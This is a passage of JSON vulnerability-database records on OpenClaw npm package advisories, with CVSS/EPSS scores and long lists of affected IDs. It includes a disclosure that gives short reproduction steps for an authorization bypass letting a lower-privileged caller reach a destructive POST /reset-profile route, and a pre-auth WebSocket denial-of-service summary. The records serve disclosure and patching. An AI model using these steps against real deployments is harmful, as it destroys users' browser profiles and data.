"https://github.com/advisories/GHSA-83f3-hh45-vfw9", "reference_id": "GHSA-83f3-hh45-vfw9", "reference_type": "", "scores": [ { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-83f3-hh45-vfw9" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/109939?format=api", "purl": "pkg:npm/openclaw@2026.4.2", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-1pbz-8rnx-dkhe" }, { "vulnerability": "VCID-29a1-7ar7-67e1" }, { "vulnerability": "VCID-2c8p-gbaw-3ye4" }, { "vulnerability": "VCID-2h6a-becf-x7ej" }, { "vulnerability": "VCID-2khh-wv8p-97ff" }, { "vulnerability": "VCID-2mxq-krq5-bycx" }, { "vulnerability": "VCID-3xmj-n798-x3cw" }, { "vulnerability": "VCID-3zwq-dz2u-pqgv" }, { "vulnerability": "VCID-4316-7q9a-xuhx" }, { "vulnerability": "VCID-4u3z-rs45-gbhe" }, { "vulnerability": "VCID-4urc-4536-pqhk" }, { "vulnerability": "VCID-6wth-qthz-yud8" }, { "vulnerability": "VCID-6y5w-am4s-6qa5" }, { "vulnerability": "VCID-73cz-n29z-uqem" }, { "vulnerability": "VCID-75yr-sbce-nkah" }, { "vulnerability": "VCID-7akj-469t-57hz" }, { "vulnerability": "VCID-7snr-fn3u-x3b8" }, { "vulnerability": "VCID-9hcd-uj62-8yeu" }, { "vulnerability": "VCID-9kgh-wj9w-ykff" }, { "vulnerability": "VCID-9xgq-vtg2-jucq" }, { "vulnerability": "VCID-a46u-tnbh-fyhs" }, { "vulnerability": "VCID-a4jz-y9s4-zkfg" }, { "vulnerability": "VCID-arks-g6hw-abbw" }, { "vulnerability": "VCID-bkya-73v8-bber" }, { "vulnerability": "VCID-c25h-khws-2fc3" }, { "vulnerability": "VCID-cbuu-4d6c-rben" }, { "vulnerability": "VCID-dfdk-dhwf-9yaj" }, { "vulnerability": "VCID-dmse-bb22-rkcj" }, { "vulnerability": "VCID-dv5s-pvw1-a7fu" }, { "vulnerability": "VCID-e25p-j5ed-yqfz" }, { "vulnerability": "VCID-e4ac-qm17-qbf5" }, { "vulnerability": "VCID-fuda-zxu8-gbb4" }, { "vulnerability": "VCID-gk95-28x9-17dk" }, { "vulnerability": "VCID-gkyv-ahk7-1ud3" }, { "vulnerability": "VCID-haxd-ps1x-h3ch" }, { "vulnerability": "VCID-hz33-9efv-c7ef" }, { "vulnerability": "VCID-jshg-1pb2-wbak" }, { "vulnerability": "VCID-k8s8-zjv4-gqdb" }, { "vulnerability": "VCID-kcy2-a98b-uyg7" }, { "vulnerability": "VCID-kxmf-d7w1-xfcv" }, { "vulnerability": "VCID-ma62-gtan-97au" }, { "vulnerability": "VCID-mszk-dr24-xugw" }, { "vulnerability": "VCID-mv8b-cryt-u3g8" }, { "vulnerability": "VCID-mxu5-yjqs-nuap" }, { "vulnerability": "VCID-nkh4-j2pe-1qhr" }, { "vulnerability": "VCID-ns77-4wfj-9ka6" }, { "vulnerability": "VCID-ntwt-jkgr-sffu" }, { "vulnerability": "VCID-nv6g-7gs9-pfan" }, { "vulnerability": "VCID-nw4r-wjgs-8qc1" }, { "vulnerability": "VCID-p7gx-9usz-yyew" }, { "vulnerability": "VCID-p8xd-2um4-9ufr" }, { "vulnerability": "VCID-pae5-uyu7-k3c1" }, { "vulnerability": "VCID-pdmd-a4fg-8fcg" }, { "vulnerability": "VCID-pj41-sunw-vbcj" }, { "vulnerability": "VCID-psms-gauf-tkbz" }, { "vulnerability": "VCID-qedr-a3ay-v3gx" }, { "vulnerability": "VCID-rr6t-1193-ybgz" }, { "vulnerability": "VCID-ry1r-br3q-2uaw" }, { "vulnerability": "VCID-t2ve-xemk-mqa9" }, { "vulnerability": "VCID-t2yy-9ume-t7be" }, { "vulnerability": "VCID-vfbb-bpy9-87ey" }, { "vulnerability": "VCID-vy8v-np82-r3b5" }, { "vulnerability": "VCID-vz7k-r7c4-ebfg" }, { "vulnerability": "VCID-w2tj-nqa6-cuam" }, { "vulnerability": "VCID-w4p1-sxdg-hyha" }, { "vulnerability": "VCID-wmr3-83u3-6qdb" }, { "vulnerability": "VCID-wyce-qxau-mqff" }, { "vulnerability": "VCID-x2ru-ydpv-f3ah" }, { "vulnerability": "VCID-xj73-kszs-yygp" }, { "vulnerability": "VCID-xnvm-rp36-vyaj" }, { "vulnerability": "VCID-xsct-xjs7-nbab" }, { "vulnerability": "VCID-y65g-4baa-a7c2" }, { "vulnerability": "VCID-ye4t-n6r3-67ab" }, { "vulnerability": "VCID-yhpq-5qy3-y7bn" }, { "vulnerability": "VCID-ymmv-2qmq-6kap" }, { "vulnerability": "VCID-z8mj-pnbe-wqej" }, { "vulnerability": "VCID-zg68-u5b5-vkft" }, { "vulnerability": "VCID-zpte-tgt5-wqcm" }, { "vulnerability": "VCID-zu4s-jnn3-1kd8" }, { "vulnerability": "VCID-zunq-wnnf-k3fw" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.4.2" } ], "aliases": [ "CVE-2026-40045", "GHSA-83f3-hh45-vfw9" ], "risk_score": 3.1, "exploitability": "0.5", "weighted_severity": "6.2", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-356u-h788-pkgt" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/91523?format=api", "vulnerability_id": "VCID-37ep-9smd-zuh9", "summary": "OpenClaw: Gateway WebSocket Denial of Service via unbounded pre-auth upgrades\n## Summary\n\nThe gateway accepted unbounded concurrent unauthenticated WebSocket upgrades before allocating them to an authenticated session budget.\n\n## Impact\n\nAn unauthenticated network attacker could consume socket and worker capacity and disrupt WebSocket availability for legitimate clients.\n\n## Affected Component\n\n`src/gateway/server-http.ts, src/gateway/server/preauth-connection-budget.ts`\n\n## Fixed Versions\n\n- Affected: `<= 2026.3.24`\n- Patched: `>= 2026.3.28`\n- Latest stable `2026.3.28` contains the fix.\n\n## Fix\n\nFixed by commit `cb5f7e201f` (`gateway: cap concurrent pre-auth websocket upgrades`).\n\nDiscovered by:Topsec AlphaLab (wang dong)", "references": [ { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-41399", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00102", "scoring_system": "epss", "scoring_elements": "0.27671", "published_at": "2026-06-05T12:55:00Z" }, { "value": "0.00102", "scoring_system": "epss", "scoring_elements": "0.27584", "published_at": "2026-06-07T12:55:00Z" }, { "value": "0.00102", "scoring_system": "epss", "scoring_elements": "0.27621", "published_at": "2026-06-06T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-41399" }, { "reference_url": "https://github.com/openclaw/openclaw", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/openclaw/openclaw" }, { "reference_url": "https://github.com/openclaw/openclaw/commit/cb5f7e201f3f86ad70e199ef850e636b4cc457ba", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/openclaw/openclaw/commit/cb5f7e201f3f86ad70e199ef850e636b4cc457ba" }, { "reference_url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-f44p-c7w9-7xr7", "reference_id": "", "reference_type": "", "scores": [ { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "5.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-f44p-c7w9-7xr7" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-41399", "reference_id": "CVE-2026-41399", "reference_type": "", "scores": [], "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-41399" }, { "reference_url": "https://github.com/advisories/GHSA-f44p-c7w9-7xr7", "reference_id": "GHSA-f44p-c7w9-7xr7", "reference_type": "", "scores": [ { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-f44p-c7w9-7xr7" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/109863?format=api", "purl": "pkg:npm/openclaw@2026.3.28", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-1j3m-fecr-f7cn" }, { "vulnerability": "VCID-1p5p-eth5-3ufu" }, { "vulnerability": "VCID-1pbz-8rnx-dkhe" }, { "vulnerability": "VCID-258k-a4dw-tfae" }, { "vulnerability": "VCID-26kp-dbu2-pqej" }, { "vulnerability": "VCID-26sg-e29u-hkf3" }, { "vulnerability": "VCID-29a1-7ar7-67e1" }, { "vulnerability": "VCID-2c8p-gbaw-3ye4" }, { "vulnerability": "VCID-2h6a-becf-x7ej" }, { "vulnerability": "VCID-2khh-wv8p-97ff" }, { "vulnerability": "VCID-2mxq-krq5-bycx" }, { "vulnerability": "VCID-2uqu-k42d-1baq" }, { "vulnerability": "VCID-2wr9-h42m-a7ev" }, { "vulnerability": "VCID-356u-h788-pkgt" }, { "vulnerability": "VCID-38g8-39ek-xbat" }, { "vulnerability": "VCID-3wsw-d4z2-dydt" }, { "vulnerability": "VCID-3xmj-n798-x3cw" }, { "vulnerability": "VCID-3zwq-dz2u-pqgv" }, { "vulnerability": "VCID-3zx4-t8cj-kbfn" }, { "vulnerability": "VCID-4316-7q9a-xuhx" }, { "vulnerability": "VCID-4hz5-f2pw-3yb4" }, { "vulnerability": "VCID-4u3z-rs45-gbhe" }, { "vulnerability": "VCID-4urc-4536-pqhk" }, { "vulnerability": "VCID-5rgx-2krs-guck" }, { "vulnerability": "VCID-6wth-qthz-yud8" }, { "vulnerability": "VCID-6y5w-am4s-6qa5" }, { "vulnerability": "VCID-733f-57ds-xugm" }, { "vulnerability": "VCID-73cz-n29z-uqem" }, { "vulnerability": "VCID-75yr-sbce-nkah" }, { "vulnerability": "VCID-7akj-469t-57hz" }, { "vulnerability": "VCID-7dyw-9b37-yqh4" }, { "vulnerability": "VCID-7ntr-5dr5-9uf8" }, { "vulnerability": "VCID-7snr-fn3u-x3b8" }, { "vulnerability": "VCID-7wmr-v7zb-6fc9" }, { "vulnerability": "VCID-7z2s-k6ty-ekg1" }, { "vulnerability": "VCID-96jd-x87b-s3ey" }, { "vulnerability": "VCID-9hcd-uj62-8yeu" }, { "vulnerability": "VCID-9kgh-wj9w-ykff" }, { "vulnerability": "VCID-9xgq-vtg2-jucq" }, { "vulnerability": "VCID-9xrt-mv81-3yc8" }, { "vulnerability": "VCID-a2wx-7b8h-c3h1" }, { "vulnerability": "VCID-a46u-tnbh-fyhs" }, { "vulnerability": "VCID-a4jz-y9s4-zkfg" }, { "vulnerability": "VCID-arks-g6hw-abbw" }, { "vulnerability": "VCID-axp9-mt9z-gkgw" }, { "vulnerability": "VCID-b9w3-w2nq-cqg6" }, { "vulnerability": "VCID-bgwh-spue-yybk" }, { "vulnerability": "VCID-bkya-73v8-bber" }, { "vulnerability": "VCID-c25h-khws-2fc3" }, { "vulnerability": "VCID-c4yt-z48z-zygv" }, { "vulnerability": "VCID-c76v-4577-n7c6" }, { "vulnerability": "VCID-carm-gpgh-wbbf" }, { "vulnerability": "VCID-cbuu-4d6c-rben" }, { "vulnerability": "VCID-cvmw-sxfq-dyhz" }, { "vulnerability": "VCID-d8v2-gft5-buee" }, { "vulnerability": "VCID-da47-zdf1-mfgf" }, { "vulnerability": "VCID-dfdk-dhwf-9yaj" }, { "vulnerability": "VCID-dmse-bb22-rkcj" }, { "vulnerability": "VCID-dv5s-pvw1-a7fu" }, { "vulnerability": "VCID-e25p-j5ed-yqfz" }, { "vulnerability": "VCID-e4ac-qm17-qbf5" }, { "vulnerability": "VCID-fekn-d6f3-xfa6" }, { "vulnerability": "VCID-fuda-zxu8-gbb4" }, { "vulnerability": "VCID-g3hg-peh1-tudm" }, { "vulnerability": "VCID-g8r6-x6s5-uydq" }, { "vulnerability": "VCID-gk95-28x9-17dk" }, { "vulnerability": "VCID-gkyv-ahk7-1ud3" }, { "vulnerability": "VCID-haxd-ps1x-h3ch" }, { "vulnerability": "VCID-hd4w-s3dp-nubj" }, { "vulnerability": "VCID-hz33-9efv-c7ef" }, { "vulnerability": "VCID-j8fb-fhyc-33fu" }, { "vulnerability": "VCID-jdqk-kv8u-xqa9" }, { "vulnerability": "VCID-jshg-1pb2-wbak" }, { "vulnerability": "VCID-k8s8-zjv4-gqdb" }, { "vulnerability": "VCID-kcy2-a98b-uyg7" }, { "vulnerability": "VCID-kxmf-d7w1-xfcv" }, { "vulnerability": "VCID-kzgh-7f6h-kfd1" }, { "vulnerability": "VCID-ma62-gtan-97au" }, { "vulnerability": "VCID-mcz5-wgu1-z7g7" }, { "vulnerability": "VCID-mszk-dr24-xugw" }, { "vulnerability": "VCID-mv8b-cryt-u3g8" }, { "vulnerability": "VCID-mxu5-yjqs-nuap" }, { "vulnerability": "VCID-nkh4-j2pe-1qhr" }, { "vulnerability": "VCID-ns77-4wfj-9ka6" }, { "vulnerability": "VCID-ntwt-jkgr-sffu" }, { "vulnerability": "VCID-nv6g-7gs9-pfan" }, { "vulnerability": "VCID-nw4r-wjgs-8qc1" }, { "vulnerability": "VCID-p7gx-9usz-yyew" }, { "vulnerability": "VCID-p7me-4bzz-83cm" }, { "vulnerability": "VCID-p7v5-jqhq-nbhz" }, { "vulnerability": "VCID-p8xd-2um4-9ufr" }, { "vulnerability": "VCID-pae5-uyu7-k3c1" }, { "vulnerability": "VCID-pdmd-a4fg-8fcg" }, { "vulnerability": "VCID-psms-gauf-tkbz" }, { "vulnerability": "VCID-q6ne-sw1r-xkd1" }, { "vulnerability": "VCID-q9jf-srt4-fbcg" }, { "vulnerability": "VCID-qedr-a3ay-v3gx" }, { "vulnerability": "VCID-qjss-tvgk-3ubk" }, { "vulnerability": "VCID-r5bw-c2py-9udf" }, { "vulnerability": "VCID-rr6t-1193-ybgz" }, { "vulnerability": "VCID-ry1r-br3q-2uaw" }, { "vulnerability": "VCID-s3wz-3yzf-ybhz" }, { "vulnerability": "VCID-sja9-6t41-hud8" }, { "vulnerability": "VCID-t2ve-xemk-mqa9" }, { "vulnerability": "VCID-t2yy-9ume-t7be" }, { "vulnerability": "VCID-t991-75e7-ykdv" }, { "vulnerability": "VCID-una1-gxkk-t3bp" }, { "vulnerability": "VCID-uy97-p1ex-y7df" }, { "vulnerability": "VCID-v9cd-65tf-p3f8" }, { "vulnerability": "VCID-vfbb-bpy9-87ey" }, { "vulnerability": "VCID-vktg-77tu-vycv" }, { "vulnerability": "VCID-vx5d-3d98-7kf3" }, { "vulnerability": "VCID-vy8v-np82-r3b5" }, { "vulnerability": "VCID-vz7k-r7c4-ebfg" }, { "vulnerability": "VCID-w2tj-nqa6-cuam" }, { "vulnerability": "VCID-w4p1-sxdg-hyha" }, { "vulnerability": "VCID-w58d-6veg-uugy" }, { "vulnerability": "VCID-watb-49vx-yub1" }, { "vulnerability": "VCID-wmr3-83u3-6qdb" }, { "vulnerability": "VCID-wx44-n3fr-skah" }, { "vulnerability": "VCID-wyce-qxau-mqff" }, { "vulnerability": "VCID-x2ru-ydpv-f3ah" }, { "vulnerability": "VCID-x4hn-ygbg-mkep" }, { "vulnerability": "VCID-x794-wfnf-1ugf" }, { "vulnerability": "VCID-x7uw-s9a6-fybd" }, { "vulnerability": "VCID-xfgw-ua7r-abbr" }, { "vulnerability": "VCID-xj73-kszs-yygp" }, { "vulnerability": "VCID-xnvm-rp36-vyaj" }, { "vulnerability": "VCID-xryt-a83q-q7et" }, { "vulnerability": "VCID-xsct-xjs7-nbab" }, { "vulnerability": "VCID-xvhd-w4tv-tqhr" }, { "vulnerability": "VCID-xz8s-hj5s-wfgj" }, { "vulnerability": "VCID-xzg5-ren5-p7gw" }, { "vulnerability": "VCID-y65g-4baa-a7c2" }, { "vulnerability": "VCID-y7sd-j9xn-qffs" }, { "vulnerability": "VCID-ye4t-n6r3-67ab" }, { "vulnerability": "VCID-yhpq-5qy3-y7bn" }, { "vulnerability": "VCID-ykwt-tdpa-3bft" }, { "vulnerability": "VCID-ymmv-2qmq-6kap" }, { "vulnerability": "VCID-ynup-4v9e-tbh4" }, { "vulnerability": "VCID-yp2w-pc58-9bf6" }, { "vulnerability": "VCID-ywrn-52gx-f3ad" }, { "vulnerability": "VCID-z7wa-tw2t-vqas" }, { "vulnerability": "VCID-z8mj-pnbe-wqej" }, { "vulnerability": "VCID-zb5t-hhkm-kfeh" }, { "vulnerability": "VCID-zg68-u5b5-vkft" }, { "vulnerability": "VCID-zkum-rn42-yyfs" }, { "vulnerability": "VCID-zpte-tgt5-wqcm" }, { "vulnerability": "VCID-zu4s-jnn3-1kd8" }, { "vulnerability": "VCID-zunq-wnnf-k3fw" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.3.28" } ], "aliases": [ "CVE-2026-41399", "GHSA-f44p-c7w9-7xr7" ], "risk_score": 3.1, "exploitability": "0.5", "weighted_severity": "6.2", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-37ep-9smd-zuh9" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/90971?format=api", "vulnerability_id": "VCID-384t-z1h8-pfft", "summary": "OpenClaw: `browser.request` still allows `POST /reset-profile` through the `operator.write` surface\n> Fixed in OpenClaw 2026.3.24, the current shipping release.\n\n# Title\n\n`browser.request` still allows `POST /reset-profile` through the `operator.write` surface in OpenClaw `v2026.3.22` after `GHSA-vmhq-cqm9-6p7q`\n\n## Severity Assessment\n\nHigh\n\nCWE:\n\n- `CWE-863: Incorrect Authorization`\n\nProposed CVSS v3.1:\n\n- `8.1` (`CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:H`)\n\nAn authenticated caller who only has access to the scoped Gateway method `browser.request` on the `operator.write` surface can still reach a destructive persistent-profile management route.\n\nLikely related advisory family:\n\n- `GHSA-vmhq-cqm9-6p7q`\n\nThis should be treated as a later-version residual or incomplete fix. The earlier fix blocked `POST /profiles/create` and profile deletion, but the latest released `v2026.3.22` code still omits `POST /reset-profile` from the same mutation gate.\n\n## Impact\n\nA caller with `operator.write` access to `browser.request` can still trigger persistent profile reset via `POST /reset-profile`.\n\nThis crosses the intended privilege boundary for browser profile management because the release already attempts to block adjacent persistent profile mutations on this same surface.\n\nIn practice, the allowed route reaches destructive behavior that can:\n\n- stop the running browser for that profile\n- close the Playwright browser connection for that profile\n- move the profile's local `userDataDir` to Trash when it exists\n\nThis is a real integrity and availability impact on persistent browser state, not a route-classification mismatch with no side effects.\n\n## Affected Component\n\nProduct:\n\n- `openclaw`\n\nTested latest released version:\n\n- release tag: `v2026.3.22`\n- release tag target commit (peeled tag): `e7d11f6c33e223a0dd8a21cfe01076bd76cef87a`\n\nPublished artifact for that release:\n\n- package: `openclaw-2026.3.22.tgz`\n- package build-info commit: `4dcc39c25c6cc63fedfd004f52d173716576fcf0`\n- package build-info timestamp: `2026-03-23T10:56:05.946Z`\n\nExact vulnerable paths on the shipped tag:\n\n- `src/gateway/method-scopes.ts:114`\n - `browser.request` is placed on the `operator.write` surface\n- `src/gateway/server-methods/browser.ts:155-165`\n - requests are only denied when `isPersistentBrowserProfileMutation(method, path)` returns true\n- `src/browser/request-policy.ts:19-25`\n - the mutation classifier recognizes `POST /profiles/create` and `DELETE /profiles/:name`, but not `POST /reset-profile`\n- `src/browser/routes/basic.ts:161-170`\n - the browser server exposes `POST /reset-profile`\n- `src/browser/server-context.reset.ts:37-63`\n - `resetProfile()` stops the browser, closes the connection, and moves the local profile directory to Trash when present\n- `src/node-host/invoke-browser.ts:240-243`\n - the same route-classification helper is reused in the browser proxy path when profile restrictions are active\n\nRelevant regression coverage gap on the shipped tag:\n\n- `src/gateway/server-methods/browser.profile-from-body.test.ts:104-140`\n - tests only block `POST /profiles/create` and `DELETE /profiles/:name`\n - there is no equivalent deny case for `POST /reset-profile`\n\nPublished artifact evidence for the exact released package:\n\n- `openclaw-2026.3.22.tgz::package/dist/build-info.json`\n- `openclaw-2026.3.22.tgz::package/dist/gateway-cli-Cxz4pSoJ.js:11469-11525`\n- `openclaw-2026.3.22.tgz::package/dist/gateway-cli-Cxz4pSoJ.js:11484-11485`\n- `openclaw-2026.3.22.tgz::package/dist/request-policy-nIRryZwZ.js:9-12`\n- `openclaw-2026.3.22.tgz::package/dist/routes-CdaHRCET.js:6874-6889`\n\nImportant release note:\n\n- the published package build-info commit differs from the release tag target commit\n- for this issue, the relevant authorization and route behavior was cross-checked in both the shipped tag source and the published package bundle, and it matches semantically on the vulnerable path\n\n## Technical Reproduction\n\nA direct control/exploit pair can be reproduced against the latest released version.\n\nPreconditions:\n\n- use `openclaw@2026.3.22`\n- authenticate as a caller that has access to the scoped Gateway method `browser.request`\n- keep that caller on `operator.write`, not `operator.admin`\n- ensure the target local browser profile exists\n\nReproduction steps:\n\n1. Call `browser.request` with:\n - `method: \"POST\"`\n - `path: \"/profiles/create\"`\n - `body: { \"name\": \"poc-profile\" }`\n2. Observe the control case is rejected with:\n - `browser.request cannot create or delete persistent browser profiles`\n3. Call `browser.request` again with:\n - `method: \"POST\"`\n - `path: \"/reset-profile\"`\n - `body: { \"profile\": \"poc-profile\", \"name\": \"poc-profile\" }`\n4. Observe that the exploit case is not rejected by the same handler.\n5. Observe that the request is forwarded to the browser route/dispatcher, rather than being denied by the mutation classifier.\n6. Observe that the reset route succeeds and applies profile reset behavior.\n\nWhy this happens in the released code:\n\n- the release tries to gate persistent profile mutation using `isPersistentBrowserProfileMutation(...)`\n- that helper does not classify `POST /reset-profile` as a protected mutation\n- the exposed browser server route still maps `/reset-profile` to `profileCtx.resetProfile()`\n- `resetProfile()` performs state-changing behavior on the selected local profile\n\n## Demonstrated Impact\n\nThe shipped release shows the following behavior difference:\n\nControl case:\n\n- `POST /profiles/create`\n- rejected before the request is dispatched to the browser control path\n\nExploit case:\n\n- `POST /reset-profile`\n- not classified as a blocked mutation\n- remains reachable through the `browser.request` surface\n- reaches `resetProfile()`, which performs destructive profile-management operations\n\nThe reached route has concrete side effects:\n\n- stops the running browser if active\n- closes the Playwright browser connection\n- moves the profile's local `userDataDir` to Trash if it exists\n\nThis is therefore a concrete authorization and policy gap on a real destructive profile-management route. It is not a complaint about the existence of `browser.request` by itself.\n\n## Environment\n\nEnvironment used for validation:\n\n- product: `openclaw`\n- latest released version: `2026.3.22`\n- release tag: `v2026.3.22`\n- release tag target commit (peeled tag): `e7d11f6c33e223a0dd8a21cfe01076bd76cef87a`\n- published package: `openclaw-2026.3.22.tgz`\n- published package build-info commit: `4dcc39c25c6cc63fedfd004f52d173716576fcf0`\n\nExplicit trust-model statement:\n\n- this report does **not** rely on adversarial or mutually untrusted operators sharing one gateway host or config\n\nScope check:\n\n- this is **not** a complaint about the existence of the explicit `browser.request` surface by itself\n- this is **not** a prompt-injection-only report\n- this is **not** a multi-tenant shared-gateway claim\n- this is **not** an attack on the unscoped HTTP compatibility endpoints\n- this is a concrete missed route inside an intended privilege gate on a real scoped Gateway method\n- the control case proves the policy is intended to exist on this surface, and the exploit case proves `POST /reset-profile` remains outside that gate in the shipped release\n\n## Remediation Advice\n\nRecommended fix:\n\n1. Extend the persistent-profile mutation classifier to include `POST /reset-profile`.\n2. Reuse the same centralized route classification everywhere the release currently relies on `isPersistentBrowserProfileMutation(...)`, including:\n - `src/gateway/server-methods/browser.ts`\n - `src/node-host/invoke-browser.ts`\n3. Add regression coverage with both:\n - a deny control for `POST /reset-profile` on the lower-privilege `browser.request` surface\n - an allow control for non-mutating browser profile reads\n4. Review nearby profile-management routes for any other state-changing endpoints that are still omitted from the mutation classifier.\n5. Treat `GHSA-vmhq-cqm9-6p7q` as the prior family and close the remaining residual route in the same policy surface.", "references": [ { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-35653", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00054", "scoring_system": "epss", "scoring_elements": "0.17412", "published_at": "2026-06-05T12:55:00Z" }, { "value": "0.00054", "scoring_system": "epss", "scoring_elements": "0.1737", "published_at": "2026-06-07T12:55:00Z" }, { "value": "0.00054", "scoring_system": "epss", "scoring_elements": "0.17407", "published_at": "2026-06-06T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-35653" }, { "reference_url": "https://github.com/openclaw/openclaw", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.1", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:H" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/openclaw/openclaw" }, { "reference_url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-xp9r-prpg-373r", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.1", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:H" }, { "value": "HIGH", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "7.2", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:H/VA:H/SC:N/SI:N/SA:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track*", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2026-04-10T16:59:20Z/" } ], "url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-xp9r-prpg-373r" }, { "reference_url": "https://github.com/openclaw/openclaw/commit/4dcc39c25c6cc63fedfd004f52d173716576fcf0", "reference_id": "4dcc39c25c6cc63fedfd004f52d173716576fcf0", "reference_type": "", "scores": [ { "value": "8.1", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:H" }, { "value": "7.2", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:H/VA:H/SC:N/SI:N/SA:N" }, { "value": "Track*", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2026-04-10T16:59:20Z/" } ], "url": "https://github.com/openclaw/openclaw/commit/4dcc39c25c6cc63fedfd004f52d173716576fcf0" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-35653", "reference_id": "CVE-2026-35653", "reference_type": "", "scores": [], "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-35653" }, { "reference_url": "https://github.com/openclaw/openclaw/commit/e7d11f6c33e223a0dd8a21cfe01076bd76cef87a", "reference_id": "e7d11f6c33e223a0dd8a21cfe01076bd76cef87a", "reference_type": "", "scores": [ { "value": "8.1", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:H" }, { "value": "7.2", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:H/VA:H/SC:N/SI:N/SA:N" }, { "value": "Track*", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2026-04-10T16:59:20Z/" } ], "url": "https://github.com/openclaw/openclaw/commit/e7d11f6c33e223a0dd8a21cfe01076bd76cef87a" }, { "reference_url": "https://github.com/advisories/GHSA-xp9r-prpg-373r", "reference_id": "GHSA-xp9r-prpg-373r", "reference_type": "", "scores": [ { "value": "HIGH", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-xp9r-prpg-373r" }, { "reference_url": "https://www.vulncheck.com/advisories/openclaw-incorrect-authorization-in-post-reset-profile-via-browser-request", "reference_id": "openclaw-incorrect-authorization-in-post-reset-profile-via-browser-request", "reference_type": "", "scores": [ { "value": "8.1", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:H" }, { "value": "7.2", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:H/VA:H/SC:N/SI:N/SA:N" }, { "value": "Track*", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2026-04-10T16:59:20Z/" } ], "url": "https://www.vulncheck.com/advisories/openclaw-incorrect-authorization-in-post-reset-profile-via-browser-request" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/110567?format=api", "purl": "pkg:npm/openclaw@2026.3.24", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-1j3m-fecr-f7cn" }, { "vulnerability": "VCID-1p3b-pfnn-x7ad" }, { "vulnerability": "VCID-1p5p-eth5-3ufu" }, { "vulnerability": "VCID-1pbz-8rnx-dkhe" }, { "vulnerability": 